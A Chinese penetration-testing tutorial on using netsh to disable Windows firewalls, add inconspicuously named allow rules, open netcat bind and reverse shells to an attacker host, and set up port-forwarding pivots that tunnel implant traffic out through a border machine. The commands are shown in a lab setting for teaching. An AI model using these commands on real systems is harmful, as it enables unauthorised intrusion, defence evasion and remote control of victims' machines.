文章首发公众号:无心的梦呓

此处文章不好排版,请移步到公众号查看
在历史消息中搜索:使用netsh来进行端口转发

目录

0x00 简介

0x01 2003命令介绍

0x02 2003以后命令介绍(以08为例)

0x03 实际利用案例

0x04 流量转发

正文

0x00 简介

netsh(Network Shell) 是一个windows系统本身提供的功能强大的网络配置命令行工具(来源于百度百科)。

注:

以下所有例子以三台机器为例来进行演示了

假设03和08为边界机器,Ubuntu为内网机器

win2003 192.168.191.128

win2008 192.168.191.131

Ubuntu 192.168.191.130

PS:为了帮助大家理解,03和08的例子采用了两种查看命令执行结果的方式

0x01 2003命令介绍
基本介绍

netsh firewall show state 查看系统防火墙状态

netsh firewall set opmode disable 关闭防火墙

netsh firewall set opmode enable 开启防火墙

设置进出站规则

根据端口

netsh firewall add portopening 协议 端口 名字
协议:TCP/UDP/ALL

端口:1-65535

名字:随意,最好使用一些有迷惑性的

netsh firewall add portopening tcp 333 test添加规则

netsh firewall delete portopening tcp 333 删除规则

根据进程

netsh firewall add allowedprogram 位置名字 允许与否

netsh firewall add allowedprogram c://nc.exe test enable 添加规则

netsh firewall delete allowedprogram c:\nc.exe 删除规则

部分单词也不需要全部记住,知道开头的内容,后面靠帮助信息进行操作就可以了

0x02 2003以后命令介绍(以08为例)

netsh advfirewall show allprofiles 查看所有类型的防火墙状态

netsh advfirewall set allprofiles state off 关闭防火墙

netsh advfirewall set allprofiles state on 开启防火墙

netsh advfirewall reset 重置防火墙规则(重置到刚装好系统时的状态)

设置进出站规则

根据端口

入站规则

netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=333 添加规则

netsh advfirewall firewall delete rule name=test dir=in protocol=tcp localport=333 删除规则

出站规则

netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=333 添加规则

netsh advfirewall firewall delete rule name=test dir=out protocol=tcp localport=333 删除规则

根据进程

入站规则

netsh advfirewall firewall add rule name=test dir=in action=allow program=c:\nc.exe 添加规则

netsh advfirewall firewall delete rule name=test dir=in program=c:\nc.exe 删除规则

出站规则

netsh advfirewall firewall add rule name=test dir=out action=allow program=c:\nc.exe 添加规则

netsh advfirewall firewall delete rule name=test dir=out program=c:\nc.exe 删除规则

0x03 实际利用案例(以2008为例)

正向连接shell

netsh advfirewall firewall add rule name=ncdir=in action=allow protocol=tcp localport=333

nc.exe -lvp 333 -e cmd

回到攻击机上

nc.exe -nv 192.168.191.131 333

虽然暂时不明白中间的报错是因为什么,但是是可以成功弹回shell的

最后一定要记得删除所添加的规则

netsh advfirewall firewall delete rule name=nc protocol=tcp localport=333

反向连接shell

首先在本地进行监听

nc.exe -lvp 333

然后到08的机子上,添加规则

netsh advfirewall firewall add rule name=nc dir=out action=allow protocol=tcp localport=333

然后执行

nc.exe -nv 10.1.135.96 333 -e cmd
注:这里10.1.135.96是我本地的机子

之后就能弹回来shell

最后不要忘了顺手删掉添加的规则

通过添加进程的,跟这个同理

0x04 流量转发

地址类型设置如下

将来自333端口的流量全部转发到192.168.191.130的22端口

netsh interface portproxy add v4tov4 listenport=333 connectaddress=192.168.191.130 connectport=22

netsh interface portproxy show all 查看所有转发规则

添加完成之后一定要查一下端口有没有起来

netsh interface portproxy delete v4tov4 listenport=333 删除转发规则

使用端口转发来连接内网机器

这里以08为例

设置进站规则

netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=333

设置流量转发

将所有来到333端口的流量全部转发到192.168.191.130的22端口上

netsh interface portproxy add v4tov4 listenport=333 connectaddress=192.168.191.130 connectport=22

查看是否添加成功,端口有没有起来

然后连接192.168.191.131的333端口,就是连接内网中192.168.191.130的22端口


在结束之后,一定要顺手把添加的规则都删除掉

netsh advfirewall firewall delete rule name=test dir=in protocol=tcp localport=333

netsh interface portproxy delete v4tov4 listenport=333

如果内网机子不能正常连外网的话,也可以在边界机器上使用流量转发来进行连接,在内网机器上种马,使其连接边界机器的指定端口,然后在边界机器将所有来自本地指定端口的流量,全部都转发到攻击者的外网主机上即可

即:

netsh interface portproxy add v4tov4 listenport=本地端口 listenaddress=本地IP connectaddress=攻击者外网IP connectport=攻击者外网端口

使用netsh来进行端口转发相关推荐

  1. windows netsh设置代理服务器/端口转发

    前言 最近项目使用git做版本控制,但公司内部网络不能上外网.想想现在git版本也是很火热的版本管理,所以就自己在虚拟机中搭建了gitlab.由于IP资源限制,虚拟机和物理主机是NAT网络关系.那么问 ...

  2. Windows中使用netsh命令进行端口转发

    在Linux中,使用iptables可以非常轻松地配置端口重定向.在Windows Server系统上,路由和远程访问服务(RRAS)通过使用虚拟专用网络 ( VP N) 或拨号连接支持远程用户或站点 ...

  3. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

  4. Windows自带的端口转发工具netsh使用方法_DOS/BAT

    Windows自带的端口转发工具netsh使用方法_DOS/BAT 作者:用户 来源:互联网 时间:2017-02-22 17:24:30 netsh 端口转发 摘要: 下面的代码在windows下运 ...

  5. netsh端口映射与端口转发

    1.netsh端口映射 netsh是windows系统自带的一个命令行工具,这个工具可以内置端口转发功能 实验场景 web服务器的80端口转发到win10的7777端口上,kali通过访问win10的 ...

  6. netsh - Windows自带的端口转发/端口映射工具

    Netsh特点 Windows自带,支持IPv4和IPv6,命令即时生效,重启系统后配置仍然存在. 缺点:不支持UDP 安装Netsh XP/2003需要先安裝IPV6,Win7以上系统自带. net ...

  7. 内网中设备通过一台主机做端口转发联通外网( TPLink路由映射,端口转发,windows自带端口转发netsh interface portproxy)

    文章目录 背景描述 需求 方案 配置有限网卡和路由器 在windows上做端口转发 背景描述 一台可以联通外网的路由器(tplink) 一台有无线网卡的计算机 n台内网设备 需求 需要让所有的设备都可 ...

  8. 【Windows自带的端口转发netsh interface portproxy,本机转发虚拟机】

    Windows自带的端口转发netsh interface portproxy,本机转发虚拟机 举例 举例 A (内网:192.168.88.100)连接在局域网网上 B (内网:192.168.88 ...

  9. 内网转发之Netsh端口转发的使用学习

    Netsh是什么 netsh(Network Shell) 是一个windows系统本身提供的功能强大的网络配置命令行工具.自Windows XP开始,Windows中就内置网络端口转发的功能.任何传 ...

最新文章

  1. 解决问题:chmod: changing permissions of ‘...‘: Read-only file system和/dev/sda1 is write-protected but ex
  2. 报名 | 挑战极限,参加2天清华数据Hackathon,赢得4万元奖金
  3. jQuery操作input改变value属性值
  4. SAP FICO年结
  5. a股用计算机模拟走势,咬牙跺脚!A股牛市不改的铁证!
  6. 如何快速测试与数据库的连接并得到连接字符串
  7. 高级数据结构与算法 | LFU缓存机制(Least Frequently Used)
  8. 统一配置数据库连接符的方法
  9. [导入][你必须知道的.NET]第十回:品味类型---值类型与引用类型(下)-应用征途...
  10. 阿里mysql 二进制_Mysql binlog 之阿里canal
  11. idea导入servlet包还是显示红色_还是从servlet 开始吧,hello servlet
  12. OPPO大数据平台运营研发实践分享
  13. Eclipse配置Tomcat并运行
  14. mysql索引数据结构图解_MySQL索引底层结构与实现原理
  15. ArcGIS Bathymetry 管理水深数据的方法
  16. 技术员 Ghost Win10 x86 装机版/纯净版 201710
  17. 竖排书A5双面打印设置指南
  18. hp android 计算器,惠普图形计算器(HP Prime Graphing Calculator)
  19. Python中的各种占位符
  20. ATECC508A芯片开发笔记(十一):NXP 平台移植ATECCx08 CryptoAuthLib库(I2C)

热门文章

  1. 学校邮箱激活idea
  2. 对话庄表伟老师-文字实录
  3. java 余额_java模拟实现 最大余额法
  4. 托福口语大讲堂:从结巴到流利的入手点
  5. 电脑升级Win11后不流畅卡顿怎么办?
  6. round函数怎么使用python_python中使用round函数的方法
  7. 【网页分享到微博、微信、qq空间、qq】
  8. Promise是什么?Promise怎么使用?回调地狱
  9. android中设置网络加载的转圈圈图标
  10. java计算机毕业设计的流浪动物救助平台的设计与实现源程序+mysql+系统+lw文档+远程调试